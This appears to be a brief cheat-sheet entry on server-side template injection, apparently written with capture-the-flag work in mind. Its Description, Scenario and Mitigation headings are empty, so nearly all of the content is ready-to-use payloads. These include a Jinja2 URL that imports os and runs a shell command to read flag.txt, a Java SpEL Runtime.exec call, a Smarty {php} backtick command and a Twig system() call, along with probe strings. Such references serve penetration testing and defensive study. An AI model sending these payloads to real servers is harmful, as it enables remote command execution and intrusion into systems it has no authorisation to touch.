SSTI
http://IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read() }}Description
Example with Scenario
Payloads and Test Cases
{{ 7*7 }} {{ config.items() }}${T(java.lang.Runtime).getRuntime().exec("ls")}{$smarty.version} {php}echo `ls`;{/php}{{ 7*7 }} {{ system('ls') }}
Mitigation
Last updated